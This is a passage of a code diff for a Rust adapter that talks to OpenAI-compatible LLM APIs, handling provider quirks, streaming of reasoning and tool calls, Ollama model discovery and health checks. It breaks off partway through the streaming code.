// partial to append into (see - // StreamAccumulator::on_event). Without - // this start event the reasoning deltas - // would be dropped and the completed - // assistant message would not carry any - // ContentBlock::Thinking — which is what - // DeepSeek V4 thinking mode requires the - // client to echo back on subsequent turns. - if !thinking_open { - yield Ok(StreamEvent::ContentBlockStart { - index: THINKING_BLOCK_INDEX, - content_block: ContentBlock::Thinking { - thinking: String::new(), - signature: String::new(), - }, - }); - thinking_open = true; - } - yield Ok(StreamEvent::ReasoningDelta { - index: THINKING_BLOCK_INDEX, - reasoning: reasoning.to_string(), - }); - break; - } - } - } - } - - // Text content delta - if let Some(content) = delta.get("content").and_then(|c| c.as_str()) { - if !content.is_empty() { - // Close any open thinking block before visible text - // starts streaming, so the blocks land in order in - // the final message: [Thinking, Text, ToolUse...]. - if thinking_open { - yield Ok(StreamEvent::ContentBlockStop { - index: THINKING_BLOCK_INDEX, - }); - thinking_open = false; - } - yield Ok(StreamEvent::TextDelta { - index: 0, - text: content.to_string(), - }); - } - } - - // Tool call deltas - if let Some(tool_calls) = - delta.get("tool_calls").and_then(|t| t.as_array()) - { - // Close any open thinking block before tool calls - // start (same ordering guarantee as for text above). - if thinking_open { - yield Ok(StreamEvent::ContentBlockStop { - index: THINKING_BLOCK_INDEX, - }); - thinking_open = false; - } - for tc in tool_calls { - let tc_index = tc - .get("index") - .and_then(|v| v.as_u64()) - .unwrap_or(0) as usize; - if let Some(tc_id) = - tc.get("id").and_then(|v| v.as_str()) - { - let name = tc - .get("function") - .and_then(|f| f.get("name")) - .and_then(|v| v.as_str()) - .unwrap_or("") - .to_string(); - let block_index = 1 + tc_index; - tool_call_buffers.insert( - block_index, - (tc_id.to_string(), name.clone(), String::new()), - ); - yield Ok(StreamEvent::ContentBlockStart { - index: block_index, - content_block: ContentBlock::ToolUse { - id: tc_id.to_string(), - name, - input: json!({}), - }, - }); - } - if let Some(args_frag) = tc - .get("function") - .and_then(|f| f.get("arguments")) - .and_then(|v| v.as_str()) - { - if !args_frag.is_empty() { - let block_index = 1 + tc_index; - if let Some((_, _, buf)) = - tool_call_buffers.get_mut(&block_index) - { - buf.push_str(args_frag); - } - yield Ok(StreamEvent::InputJsonDelta { - index: block_index, - partial_json: args_frag.to_string(), - }); - } - } - } - } - - // finish_reason - if let Some(finish_reason) = - choice.get("finish_reason").and_then(|v| v.as_str()) - { - if !finish_reason.is_empty() && finish_reason != "null" { - // Flush any still-open thinking block first so it - // is finalized into the assistant message. - if thinking_open { - yield Ok(StreamEvent::ContentBlockStop { - index: THINKING_BLOCK_INDEX, - }); - thinking_open = false; - } - yield Ok(StreamEvent::ContentBlockStop { index: 0 }); - let mut tc_indices: Vec = - tool_call_buffers.keys().cloned().collect(); - tc_indices.sort(); - for idx in tc_indices { - yield Ok(StreamEvent::ContentBlockStop { index: idx }); - } - - let stop_reason = - OpenAiProvider::map_finish_reason_pub(finish_reason); - - let usage_val = chunk_json.get("usage"); - let usage = usage_val.map(|u| OpenAiProvider::parse_usage_pub(Some(u))); - - yield Ok(StreamEvent::MessageDelta { - stop_reason: Some(stop_reason), - usage, - }); - } - } - } - } - - if message_started { - yield Ok(StreamEvent::MessageStop); - } - }; - - Ok(Box::pin(s)) - } - - async fn list_models(&self) -> Result, ProviderError> { - // Use Ollama native API when configured — provides richer metadata - // (parameter size, quantization, actual context window) than the - // generic OpenAI-compat /v1/models endpoint. - if let Some(ref ollama_host) = self.quirks.ollama_native_host { - return self.list_models_ollama_native(ollama_host).await; - } - - let url = format!("{}/models", self.base_url.trim_end_matches('/')); - let builder = self.http_client.get(&url); - let builder = self.apply_auth(builder); - let builder = self.apply_extra_headers(builder); - - let resp = builder.send().await.map_err(|e| ProviderError::Other { - provider: self.id.clone(), - message: format!("HTTP request failed: {}", e), - status: None, - body: None, - })?; - - let status = resp.status().as_u16(); - let text = resp.text().await.map_err(|e| ProviderError::Other { - provider: self.id.clone(), - message: format!("Failed to read response body: {}", e), - status: Some(status), - body: None, - })?; - - if !(200..300).contains(&(status as usize)) { - return Err(self.map_http_error(status, &text)); - } - - let json: Value = - serde_json::from_str(&text).map_err(|e| ProviderError::Other { - provider: self.id.clone(), - message: format!("Failed to parse models JSON: {}", e), - status: Some(status), - body: Some(text), - })?; - - let data = match json.get("data").and_then(|d| d.as_array()) { - Some(d) => d, - None => return Ok(vec![]), - }; - - let provider_id = self.id.clone(); - let models: Vec = data - .iter() - .filter_map(|m| { - let id = m.get("id").and_then(|v| v.as_str())?; - Some(ModelInfo { - id: ModelId::new(id), - provider_id: provider_id.clone(), - name: id.to_string(), - context_window: match id { - "gpt-5" | "gpt-5.4" | "gpt-5.2" | "gpt-5-mini" | "gpt-5-nano" - | "gpt-5-chat-latest" - | "gpt-5.2-codex" | "gpt-5.1-codex" | "gpt-5.1-codex-mini" - | "gpt-5.1-codex-max" => 400_000, - "o3" | "o3-mini" | "o4-mini" => 200_000, - _ => 128_000, - }, - max_output_tokens: 16_384, - }) - }) - .collect(); - - Ok(models) - } - - async fn health_check(&self) -> Result { - // Providers that need an API key but have none configured are - // immediately unavailable without making a network call. - if self.has_no_key() { - // Providers that never require an API key (Ollama, LM Studio, - // llama.cpp) should always proceed to the live health probe, - // regardless of whether the base URL is local or remote. This - // allows remote/VPS-hosted instances to be used without a key. - // - // For all other providers a missing key means the env var was - // absent or empty; report that without making a network call, - // distinguishing only by URL when the quirk is not set. - if !self.quirks.no_api_key_required { - let is_local = self.base_url.contains("localhost") - || self.base_url.contains("127.0.0.1") - || self.base_url.contains("::1"); - - if !is_local { - return Ok(ProviderStatus::Unavailable { - reason: "No API key configured".to_string(), - }); - } - } - } - - // For Ollama, prefer the native `/api/tags` endpoint over the - // OpenAI-compatible `/v1/models` one — older Ollama versions do not - // expose `/v1/models` and would return 404. - let url = if let Some(ref host) = self.quirks.ollama_native_host { - format!("{}/api/tags", host.trim_end_matches('/')) - } else { - format!("{}/models", self.base_url.trim_end_matches('/')) - }; - let builder = self.http_client.get(&url); - let builder = self.apply_auth(builder); - let builder = self.apply_extra_headers(builder); - - match builder.send().await { - Ok(r) if r.status().is_success() => Ok(ProviderStatus::Healthy), - Ok(r) => Ok(ProviderStatus::Unavailable { - reason: format!("models endpoint returned {}", r.status()), - }), - Err(e) => Ok(ProviderStatus::Unavailable { - reason: e.to_string(), - }), - } - } - - fn capabilities(&self) -> ProviderCapabilities { - ProviderCapabilities { - streaming: true, - tool_calling: true, - thinking: self.quirks.reasoning_field.is_some(), - image_input: true, - pdf_input: false, - audio_input: false, - video_input: false, - caching: false, - structured_output: true, - system_prompt_style: SystemPromptStyle::SystemMessage, - } - } -} - -#[cfg(test)] -mod tests { - use super::*; - use serde_json::json; - - #[test] - fn mistral_tool_ids_match_opencode_style() { - let provider = OpenAiCompatProvider::new("mistral", "Mistral", "https://example.com") - .with_quirks(ProviderQuirks { - tool_id_max_len: Some(9), - tool_id_alphanumeric_only: true, - ..Default::default() - }); - - assert_eq!(provider.scrub_tool_id("call-123456789abc"), "call12345"); - assert_eq!(provider.scrub_tool_id("x"), "x00000000"); - } - - #[test] - fn fix_tool_user_sequence_inserts_done_between_tool_and_user() { - let mut messages = vec![ - json!({"role": "tool", "tool_call_id": "call_1", "content": "ok"}), - json!({"role": "user", "content": "continue"}), - ]; - - OpenAiCompatProvider::apply_fix_tool_user_sequence(&mut messages); - - assert_eq!(messages.len(), 3); - assert_eq!(messages[1]["role"], json!("assistant")); - assert_eq!(messages[1]["content"], json!("Done.")); - } -} +// providers/openai_compat.rs — OpenAI-Compatible generic provider adapter. +// +// A configurable OpenAI Chat Completions adapter that can target any +// provider exposing an OpenAI-compatible API. Configure base URL, auth, +// extra headers, and per-provider behavioural quirks via the builder API. + +use std::pin::Pin; + +use async_stream::stream; +use async_trait::async_trait; +use claurst_core::provider_id::{ModelId, ProviderId}; +use claurst_core::types::{ContentBlock, UsageInfo}; +use futures::Stream; +use serde_json::{json, Value}; +use tracing::debug; + +use crate::error_handling::parse_error_response; +use crate::provider::{LlmProvider, ModelInfo}; +use crate::provider_error::ProviderError; +use crate::provider_types::{ + ProviderCapabilities, ProviderRequest, ProviderResponse, ProviderStatus, StreamEvent, + SystemPromptStyle, +}; + +// Re-use the message transformation helpers from openai.rs. +use super::openai::OpenAiProvider; +use super::request_options::merge_openai_compatible_options; + +// --------------------------------------------------------------------------- +// ProviderQuirks +// --------------------------------------------------------------------------- + +/// Provider-specific behavioural quirks that alter how the generic adapter +/// builds and interprets requests/responses. +#[derive(Debug, Clone, Default)] +pub struct ProviderQuirks { + /// Truncate tool call IDs to at most this many characters before sending. + /// For example, Mistral requires tool IDs of at most 9 characters. + pub tool_id_max_len: Option, + + /// If `true`, strip all non-alphanumeric characters from tool IDs. + pub tool_id_alphanumeric_only: bool, + + /// Extra error-message substrings (or regex-like patterns) that indicate + /// the request exceeded the model's context window. + pub overflow_patterns: Vec, + + /// Whether to send `{"stream_options": {"include_usage": true}}` when + /// streaming. Required by some providers to receive token counts. + pub include_usage_in_stream: bool, + + /// Override the sampling temperature when the request does not specify one. + pub default_temperature: Option, + + /// Some providers (e.g. older Mistral releases) reject a message sequence + /// that goes …tool_result → user… without an intervening assistant turn. + /// When `true`, an `{"role":"assistant","content":"Done."}` message is + /// inserted between any `role: tool` message and a following `role: user` + /// message. + pub fix_tool_user_sequence: bool, + + /// Name of the JSON field in the assistant message that carries extended + /// reasoning / thinking text. `None` means the provider does not expose + /// reasoning output. Example: `Some("reasoning_content")` for DeepSeek. + pub reasoning_field: Option, + + /// Whether this provider requires reasoning_content to be echoed back on + /// subsequent turns in multi-turn conversations. DeepSeek V4 is currently + /// the only provider with this requirement; most providers ignore this field. + /// When false, reasoning is not included in outbound messages to save tokens. + pub requires_reasoning_roundtrip: bool, + + /// Hard cap on `max_tokens` sent to this provider. When the request + /// carries a higher value it is silently clamped down to this limit. + /// Use this for providers whose models have a lower output ceiling than + /// the default we request (e.g. DeepSeek Chat caps at 8 192). + pub max_tokens_cap: Option, + + /// Set to `true` for providers that never require an API key (e.g. + /// Ollama, LM Studio, llama.cpp). When `true`, `health_check()` will + /// always attempt a live network probe regardless of whether the base URL + /// points to a local or remote host, instead of short-circuiting with + /// "No API key configured". + pub no_api_key_required: bool, + + /// When set, `list_models()` uses Ollama's native `/api/tags` endpoint + /// (and optionally `/api/show` for per-model metadata) instead of the + /// OpenAI-compatible `/v1/models` endpoint. The value is the Ollama host + /// root (e.g. `"http://localhost:11434"`) so the native API can be called + /// independently of the `/v1` base URL used for chat completions. + pub ollama_native_host: Option, +} + +// --------------------------------------------------------------------------- +// OpenAiCompatProvider +// --------------------------------------------------------------------------- + +pub struct OpenAiCompatProvider { + id: ProviderId, + name: String, + base_url: String, + api_key: Option, + extra_headers: Vec<(String, String)>, + quirks: ProviderQuirks, + http_client: reqwest::Client, +} + +impl OpenAiCompatProvider { + /// Create a new compat provider. `base_url` should already include any + /// path prefix (e.g. `"https://api.groq.com/openai/v1"`). + pub fn new( + id: impl Into, + name: impl Into, + base_url: impl Into, + ) -> Self { + let http_client = reqwest::Client::builder() + .timeout(std::time::Duration::from_secs(600)) + .build() + .expect("failed to build reqwest client"); + + Self { + id: ProviderId::new(id), + name: name.into(), + base_url: base_url.into(), + api_key: None, + extra_headers: Vec::new(), + quirks: ProviderQuirks::default(), + http_client, + } + } + + /// Set an API key that will be sent as `Authorization: Bearer `. + pub fn with_api_key(mut self, key: String) -> Self { + self.api_key = if key.is_empty() { None } else { Some(key) }; + self + } + + /// Append a custom header sent on every request. + pub fn with_header(mut self, name: impl Into, value: impl Into) -> Self { + self.extra_headers.push((name.into(), value.into())); + self + } + + /// Apply provider-specific quirks. + pub fn with_quirks(mut self, quirks: ProviderQuirks) -> Self { + self.quirks = quirks; + self + } + + /// Override the base URL (e.g. from a user-supplied --api-base flag). + pub fn with_base_url(mut self, base_url: impl Into) -> Self { + self.base_url = base_url.into(); + self + } + + // ----------------------------------------------------------------------- + // Internal helpers + // ----------------------------------------------------------------------- + + /// Returns `true` when the provider has no usable API key. + fn has_no_key(&self) -> bool { + self.api_key.is_none() + } + + /// Scrub a tool-call ID according to the configured quirks. + fn scrub_tool_id(&self, id: &str) -> String { + let mut s = id.to_string(); + if self.quirks.tool_id_alphanumeric_only { + s = s.chars().filter(|c| c.is_alphanumeric()).collect(); + } + if let Some(max_len) = self.quirks.tool_id_max_len { + let truncated: String = s.chars().take(max_len).collect(); + s = format!("{:0) { + let mut i = 0; + while i + 1 < messages.len() { + let current_is_tool = messages[i].get("role").and_then(|v| v.as_str()) == Some("tool"); + let next_is_user = messages[i + 1].get("role").and_then(|v| v.as_str()) == Some("user"); + + if current_is_tool && next_is_user { + messages.insert(i + 1, json!({ "role": "assistant", "content": "Done." })); + i += 2; // skip past the inserted message and the user message + } else { + i += 1; + } + } + } + + /// Build the full messages array, applying all quirks. + fn build_messages(&self, request: &ProviderRequest) -> Vec { + let mut messages = OpenAiProvider::to_openai_messages_pub( + &request.messages, + request.system_prompt.as_ref(), + ); + + self.apply_tool_id_quirks(&mut messages); + + if self.quirks.fix_tool_user_sequence { + Self::apply_fix_tool_user_sequence(&mut messages); + } + + // For providers that require reasoning_content in multi-turn conversations + // (e.g. DeepSeek V4), inject reasoning text back into assistant messages + // that contain tool calls. Non-tool-call turns omit the field to save tokens. + // Only providers with requires_reasoning_roundtrip=true need this. + if self.quirks.requires_reasoning_roundtrip { + if let Some(ref field) = self.quirks.reasoning_field { + Self::inject_reasoning_for_tool_turns(&mut messages, &request.messages, field); + } + } + + // Some providers (DeepSeek when reasoning_roundtrip enabled, Ollama) reject + // `content: null` on assistant messages — replace with an empty string. + if self.quirks.requires_reasoning_roundtrip || self.quirks.no_api_key_required { + Self::ensure_content_not_null(&mut messages); + } + + messages + } + + /// For providers that expose a reasoning field, inject the reasoning + /// text into assistant messages that contain tool calls. + /// + /// DeepSeek's thinking mode requires `reasoning_content` to be sent back + /// on turns where tool calls occurred. Turns without tool calls omit it — + /// the API ignores it anyway and skipping saves tokens. + fn inject_reasoning_for_tool_turns( + json_messages: &mut [Value], + original_messages: &[claurst_core::types::Message], + field: &str, + ) { + use claurst_core::types::{MessageContent, Role}; + + // Collect reasoning texts from assistant messages that have both + // Thinking blocks and ToolUse blocks, preserving order. + let reasoning_texts: Vec = original_messages + .iter() + .filter_map(|msg| { + if msg.role != Role::Assistant { + return None; + } + let blocks = match &msg.content { + MessageContent::Blocks(b) => b, + _ => return None, + }; + let has_tool_use = blocks + .iter() + .any(|b| matches!(b, ContentBlock::ToolUse { .. })); + if !has_tool_use { + return None; + } + let thinking: Vec<&str> = blocks + .iter() + .filter_map(|b| match b { + ContentBlock::Thinking { thinking, .. } => Some(thinking.as_str()), + _ => None, + }) + .collect(); + if thinking.is_empty() { + None + } else { + Some(thinking.join("")) + } + }) + .collect(); + + if reasoning_texts.is_empty() { + return; + } + + // Inject into JSON messages: for each assistant message that carries + // tool_calls, add the reasoning field from the collected texts. + let mut reasoning_idx = 0; + for msg in json_messages.iter_mut() { + if reasoning_idx >= reasoning_texts.len() { + break; + } + let is_assistant = msg.get("role").and_then(|r| r.as_str()) == Some("assistant"); + let has_tool_calls = msg + .get("tool_calls") + .and_then(|tc| tc.as_array()) + .map(|a| !a.is_empty()) + .unwrap_or(false); + if is_assistant && has_tool_calls { + if let Some(obj) = msg.as_object_mut() { + obj.insert( + field.to_string(), + Value::String(reasoning_texts[reasoning_idx].clone()), + ); + } + reasoning_idx += 1; + } + } + } + + /// Replace `content: null` with `content: ""` on all assistant messages. + /// + /// DeepSeek's API rejects assistant messages that have `content: null` + /// (it treats null as absent and then complains that neither content nor + /// tool_calls is set). Replacing with an empty string satisfies the + /// validation while preserving semantics. + fn ensure_content_not_null(messages: &mut [Value]) { + for msg in messages.iter_mut() { + let is_assistant = msg.get("role").and_then(|r| r.as_str()) == Some("assistant"); + if !is_assistant { + continue; + } + if let Some(obj) = msg.as_object_mut() { + if let Some(content) = obj.get("content") { + if content.is_null() { + obj.insert("content".to_string(), Value::String(String::new())); + } + } + } + } + } + + /// Resolve the temperature to use: request value takes priority, then + /// the quirk default, then nothing (let the API default apply). + fn resolve_temperature(&self, request: &ProviderRequest) -> Option { + request.temperature.or(self.quirks.default_temperature) + } + + /// Attach the authorization header if an API key is configured. + fn apply_auth(&self, builder: reqwest::RequestBuilder) -> reqwest::RequestBuilder { + if let Some(key) = &self.api_key { + builder.header("Authorization", format!("Bearer {}", key)) + } else { + builder + } + } + + /// Attach all configured extra headers. + fn apply_extra_headers(&self, mut builder: reqwest::RequestBuilder) -> reqwest::RequestBuilder { + for (name, value) in &self.extra_headers { + builder = builder.header(name.as_str(), value.as_str()); + } + builder + } + + fn map_http_error(&self, status: u16, body: &str) -> ProviderError { + parse_error_response(status, body, &self.id) + } + + // ----------------------------------------------------------------------- + // Non-streaming + // ----------------------------------------------------------------------- + + async fn create_message_non_streaming( + &self, + request: &ProviderRequest, + ) -> Result { + let messages = self.build_messages(request); + let tools = OpenAiProvider::to_openai_tools_pub(&request.tools); + + let max_tokens = match self.quirks.max_tokens_cap { + Some(cap) => request.max_tokens.min(cap), + None => request.max_tokens, + }; + let mut body = json!({ + "model": request.model, + "max_tokens": max_tokens, + "messages": messages, + "stream": false, + }); + + if !tools.is_empty() { + body["tools"] = json!(tools); + } + if let Some(t) = self.resolve_temperature(request) { + body["temperature"] = json!(t); + } + if let Some(p) = request.top_p { + body["top_p"] = json!(p); + } + if !request.stop_sequences.is_empty() { + body["stop"] = json!(request.stop_sequences); + } + merge_openai_compatible_options(&mut body, &request.provider_options); + + let url = format!("{}/chat/completions", self.base_url.trim_end_matches('/')); + let builder = self + .http_client + .post(&url) + .header("Content-Type", "application/json"); + let builder = self.apply_auth(builder); + let builder = self.apply_extra_headers(builder); + + let resp = builder + .json(&body) + .send() + .await + .map_err(|e| ProviderError::Other { + provider: self.id.clone(), + message: format!("HTTP request failed: {}", e), + status: None, + body: None, + })?; + + let status = resp.status().as_u16(); + let text = resp.text().await.map_err(|e| ProviderError::Other { + provider: self.id.clone(), + message: format!("Failed to read response body: {}", e), + status: Some(status), + body: None, + })?; + + if !(200..300).contains(&(status as usize)) { + return Err(self.map_http_error(status, &text)); + } + + let json: Value = serde_json::from_str(&text).map_err(|e| ProviderError::Other { + provider: self.id.clone(), + message: format!("Failed to parse response JSON: {}", e), + status: Some(status), + body: Some(text.clone()), + })?; + + OpenAiProvider::parse_non_streaming_response_pub(&json, &self.id) + } + + // ----------------------------------------------------------------------- + // Streaming + // ----------------------------------------------------------------------- + + async fn do_streaming( + &self, + request: &ProviderRequest, + ) -> Result { + let messages = self.build_messages(request); + let tools = OpenAiProvider::to_openai_tools_pub(&request.tools); + + let max_tokens = match self.quirks.max_tokens_cap { + Some(cap) => request.max_tokens.min(cap), + None => request.max_tokens, + }; + let mut body = json!({ + "model": request.model, + "max_tokens": max_tokens, + "messages": messages, + "stream": true, + }); + + if self.quirks.include_usage_in_stream { + body["stream_options"] = json!({ "include_usage": true }); + } + + if !tools.is_empty() { + body["tools"] = json!(tools); + } + if let Some(t) = self.resolve_temperature(request) { + body["temperature"] = json!(t); + } + if let Some(p) = request.top_p { + body["top_p"] = json!(p); + } + if !request.stop_sequences.is_empty() { + body["stop"] = json!(request.stop_sequences); + } + merge_openai_compatible_options(&mut body, &request.provider_options); + + let url = format!("{}/chat/completions", self.base_url.trim_end_matches('/')); + let builder = self + .http_client + .post(&url) + .header("Content-Type", "application/json") + .header("Accept", "text/event-stream"); + let builder = self.apply_auth(builder); + let builder = self.apply_extra_headers(builder); + + let resp = builder + .json(&body) + .send() + .await + .map_err(|e| ProviderError::Other { + provider: self.id.clone(), + message: format!("HTTP request failed: {}", e), + status: None, + body: None, + })?; + + let status = resp.status().as_u16(); + if !(200..300).contains(&(status as usize)) { + let text = resp.text().await.unwrap_or_default(); + return Err(self.map_http_error(status, &text)); + } + + Ok(resp) + } + + // ----------------------------------------------------------------------- + // Ollama native model discovery + // ----------------------------------------------------------------------- + + /// List models using Ollama's native `/api/tags` endpoint, then enrich + /// each model with metadata from `/api/show` (context window, parameter + /// size, quantization level). + /// + /// Models are sorted with coding-oriented models first (names containing + /// "code" or "coder"), then by parameter size descending, so the best + /// local coding model naturally appears at the top. + async fn list_models_ollama_native( + &self, + ollama_host: &str, + ) -> Result, ProviderError> { + let tags_url = format!("{}/api/tags", ollama_host.trim_end_matches('/')); + + let resp = + self.http_client + .get(&tags_url) + .send() + .await + .map_err(|e| ProviderError::Other { + provider: self.id.clone(), + message: format!("Ollama /api/tags request failed: {}", e), + status: None, + body: None, + })?; + + let status = resp.status().as_u16(); + let text = resp.text().await.map_err(|e| ProviderError::Other { + provider: self.id.clone(), + message: format!("Failed to read /api/tags response: {}", e), + status: Some(status), + body: None, + })?; + + if !(200..300).contains(&(status as usize)) { + return Err(self.map_http_error(status, &text)); + } + + let json: Value = serde_json::from_str(&text).map_err(|e| ProviderError::Other { + provider: self.id.clone(), + message: format!("Failed to parse /api/tags JSON: {}", e), + status: Some(status), + body: Some(text), + })?; + + let models_arr = match json.get("models").and_then(|m| m.as_array()) { + Some(m) => m, + None => return Ok(vec![]), + }; + + // Collect model names from /api/tags. + let model_names: Vec = models_arr + .iter() + .filter_map(|m| m.get("name").and_then(|n| n.as_str()).map(String::from)) + .collect(); + + // Fetch detailed metadata for each model via /api/show. + let show_url_base = format!("{}/api/show", ollama_host.trim_end_matches('/')); + let provider_id = self.id.clone(); + + let mut models: Vec<(ModelInfo, bool, u64)> = Vec::with_capacity(model_names.len()); + + for name in &model_names { + let (context_window, max_output, is_coder, param_size) = + self.fetch_ollama_model_info(&show_url_base, name).await; + + models.push(( + ModelInfo { + id: ModelId::new(name.as_str()), + provider_id: provider_id.clone(), + name: Self::ollama_display_name(name), + context_window, + max_output_tokens: max_output, + }, + is_coder, + param_size, + )); + } + + // Sort: coding models first, then by parameter size descending. + models.sort_by(|a, b| { + b.1.cmp(&a.1) // coders first + .then_with(|| b.2.cmp(&a.2)) // larger models first + }); + + Ok(models.into_iter().map(|(info, _, _)| info).collect()) + } + + /// Call `/api/show` for a single model to extract its actual context + /// window, parameter count, and whether it's coding-oriented. + /// + /// Returns `(context_window, max_output_tokens, is_coder, param_size_bytes)`. + /// Falls back to sensible defaults if the request fails. + async fn fetch_ollama_model_info( + &self, + show_url: &str, + model_name: &str, + ) -> (u32, u32, bool, u64) { + let default_ctx = 4_096u32; + let default_out = 2_048u32; + let lower = model_name.to_lowercase(); + let is_coder_by_name = lower.contains("code") + || lower.contains("coder") + || lower.contains("codestral") + || lower.contains("starcoder") + || lower.contains("deepseek-coder") + || lower.contains("qwen2.5-coder"); + + let body = serde_json::json!({ "name": model_name }); + let resp = match self.http_client.post(show_url).json(&body).send().await { + Ok(r) if r.status().is_success() => r, + _ => return (default_ctx, default_out, is_coder_by_name, 0), + }; + + let json: Value = match resp.json().await { + Ok(j) => j, + Err(_) => return (default_ctx, default_out, is_coder_by_name, 0), + }; + + // Extract parameter size from model_info. + let param_size = json + .get("model_info") + .and_then(|mi| mi.get("general.parameter_count").and_then(|v| v.as_u64())) + .unwrap_or(0); + + // Extract num_ctx from the modelfile parameters or model_info. + let num_ctx = Self::extract_num_ctx(&json).unwrap_or(default_ctx); + + // Max output is typically a fraction of context window for local + // models. Use half the context or 4096, whichever is smaller. + let max_output = std::cmp::min(num_ctx / 2, 4_096); + + // Check if the model family or template indicates coding capability. + let family = json + .get("model_info") + .and_then(|mi| mi.get("general.basename").and_then(|v| v.as_str())) + .unwrap_or(""); + let is_coder = is_coder_by_name || family.contains("code") || family.contains("coder"); + + (num_ctx, max_output, is_coder, param_size) + } + + /// Extract `num_ctx` (context window) from the `/api/show` response. + /// + /// Ollama stores this in the modelfile parameters string (e.g. + /// `"num_ctx 32768"`) or in `model_info` under context-length keys. + fn extract_num_ctx(json: &Value) -> Option { + // 1. Check model_info for context length keys. + if let Some(mi) = json.get("model_info") { + for key in &[ + "llama.context_length", + "qwen2.context_length", + "gemma.context_length", + "gemma2.context_length", + "phi3.context_length", + "mistral.context_length", + "starcoder2.context_length", + "deepseek2.context_length", + "command-r.context_length", + "granite.context_length", + ] { + if let Some(v) = mi.get(*key).and_then(|v| v.as_u64()) { + return Some(v as u32); + } + } + + // Fallback: scan all keys ending in ".context_length" + if let Some(obj) = mi.as_object() { + for (k, v) in obj { + if k.ends_with(".context_length") { + if let Some(n) = v.as_u64() { + return Some(n as u32); + } + } + } + } + } + + // 2. Parse from the modelfile parameters string. + if let Some(params) = json.get("parameters").and_then(|p| p.as_str()) { + for line in params.lines() { + let trimmed = line.trim(); + if let Some(rest) = trimmed.strip_prefix("num_ctx") { + if let Ok(n) = rest.trim().parse::() { + return Some(n); + } + } + } + } + + None + } + + /// Produce a human-readable display name from an Ollama model name. + /// + /// `"qwen2.5-coder:32b-instruct-q4_K_M"` → `"Qwen 2.5 Coder (32B, Q4_K_M)"` + fn ollama_display_name(raw: &str) -> String { + let (base, tag) = raw.split_once(':').unwrap_or((raw, "latest")); + + let pretty_base = base + .replace(['-', '_'], " ") + .split_whitespace() + .map(|word| { + let mut chars = word.chars(); + match chars.next() { + None => String::new(), + Some(c) => { + let upper: String = c.to_uppercase().collect(); + format!("{}{}", upper, chars.as_str()) + } + } + }) + .collect::>() + .join(" "); + + if tag == "latest" { + return pretty_base; + } + + let tag_parts: Vec<&str> = tag.split('-').collect(); + let mut size_part = None; + let mut quant_part = None; + for part in &tag_parts { + let lower = part.to_lowercase(); + if lower.ends_with('b') && lower.trim_end_matches('b').parse::().is_ok() { + size_part = Some(part.to_uppercase()); + } else if lower.starts_with('q') && lower.len() > 1 { + quant_part = Some(part.to_uppercase()); + } + } + + match (size_part, quant_part) { + (Some(s), Some(q)) => format!("{} ({}, {})", pretty_base, s, q), + (Some(s), None) => format!("{} ({})", pretty_base, s), + (None, Some(q)) => format!("{} ({})", pretty_base, q), + (None, None) => format!("{} ({})", pretty_base, tag), + } + } +} + +// --------------------------------------------------------------------------- +// LlmProvider impl +// --------------------------------------------------------------------------- + +#[async_trait] +impl LlmProvider for OpenAiCompatProvider { + fn id(&self) -> &ProviderId { + &self.id + } + + fn name(&self) -> &str { + &self.name + } + + async fn create_message( + &self, + request: ProviderRequest, + ) -> Result { + if self.has_no_key() { + // Providers that have no key set are considered unconfigured. + // We allow the call to proceed in case the provider genuinely needs + // no auth (e.g. Ollama), but callers that gate on health_check() + // will see Unavailable first. + } + self.create_message_non_streaming(&request).await + } + + async fn create_message_stream( + &self, + request: ProviderRequest, + ) -> Result> + Send>>, ProviderError> + { + let resp = self.do_streaming(&request).await?; + let provider_id = self.id.clone(); + let reasoning_field = self.quirks.reasoning_field.clone(); + + let s = stream! { + use futures::StreamExt; + + let mut byte_stream = resp.bytes_stream(); + let mut leftover = String::new(); + + let mut message_started = false; + let mut message_id = String::from("unknown"); + let mut model_name = String::new(); + // Dedicated index for the Thinking content block emitted when a + // provider streams a `reasoning_content` field (DeepSeek V4, etc.). + // Chosen to avoid colliding with text (index 0) or tool calls + // (1 + tc_index). + const THINKING_BLOCK_INDEX: usize = usize::MAX - 100; + let mut thinking_open = false; + let mut tool_call_buffers: std::collections::HashMap< + usize, + (String, String, String), + > = std::collections::HashMap::new(); + + while let Some(chunk_result) = byte_stream.next().await { + let chunk = match chunk_result { + Ok(c) => c, + Err(e) => { + yield Err(ProviderError::StreamError { + provider: provider_id.clone(), + message: format!("Stream read error: {}", e), + partial_response: None, + }); + return; + } + }; + + let text = String::from_utf8_lossy(&chunk); + let combined = if leftover.is_empty() { + text.to_string() + } else { + let mut s = std::mem::take(&mut leftover); + s.push_str(&text); + s + }; + + let mut lines: Vec<&str> = combined.split('\n').collect(); + if !combined.ends_with('\n') { + leftover = lines.pop().unwrap_or("").to_string(); + } + + for line in lines { + let line = line.trim_end_matches('\r').trim(); + + if line.is_empty() || line.starts_with(':') { + continue; + } + + let data = if let Some(rest) = line.strip_prefix("data:") { + rest.trim() + } else { + continue; + }; + + if data == "[DONE]" { + yield Ok(StreamEvent::MessageStop); + return; + } + + let chunk_json: Value = match serde_json::from_str(data) { + Ok(v) => v, + Err(e) => { + debug!("Failed to parse SSE chunk: {}: {}", e, data); + continue; + } + }; + + if !message_started { + if let Some(id) = chunk_json.get("id").and_then(|v| v.as_str()) { + message_id = id.to_string(); + } + if let Some(m) = chunk_json.get("model").and_then(|v| v.as_str()) { + model_name = m.to_string(); + } + yield Ok(StreamEvent::MessageStart { + id: message_id.clone(), + model: model_name.clone(), + usage: UsageInfo::default(), + }); + yield Ok(StreamEvent::ContentBlockStart { + index: 0, + content_block: ContentBlock::Text { text: String::new() }, + }); + message_started = true; + } + + let choices = match chunk_json.get("choices").and_then(|c| c.as_array()) { + Some(c) => c, + None => { + if let Some(usage_val) = chunk_json.get("usage") { + let usage = OpenAiProvider::parse_usage_pub(Some(usage_val)); + yield Ok(StreamEvent::MessageDelta { + stop_reason: None, + usage: Some(usage), + }); + } + continue; + } + }; + + let choice = match choices.first() { + Some(c) => c, + None => continue, + }; + + let delta = match choice.get("delta") { + Some(d) => d, + None => continue, + }; + + // Reasoning / thinking extraction. + // Check the provider-specific field first (e.g. DeepSeek's + // "reasoning_content"), then fall back to common field names + // used by other providers (Copilot "reasoning_text", generic + // "reasoning", etc.). This allows reasoning traces to show + // for any provider that emits them without needing explicit + // per-provider configuration. + { + const COMMON_REASONING_FIELDS: &[&str] = &[ + "reasoning_content", // DeepSeek + "reasoning_text", // GitHub Copilot + "reasoning", // Generic / future + ]; + let fields_to_check: Vec<&str> = if let Some(ref f) = reasoning_field { + // Provider-specific field first, then common ones + let mut v = vec![f.as_str()]; + for common in COMMON_REASONING_FIELDS { + if *common != f.as_str() { + 